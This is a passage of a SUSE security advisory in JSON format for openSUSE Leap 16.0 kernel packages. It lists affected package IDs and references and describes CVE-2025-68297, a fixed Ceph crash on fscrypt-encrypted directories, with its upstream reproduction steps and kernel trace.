"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
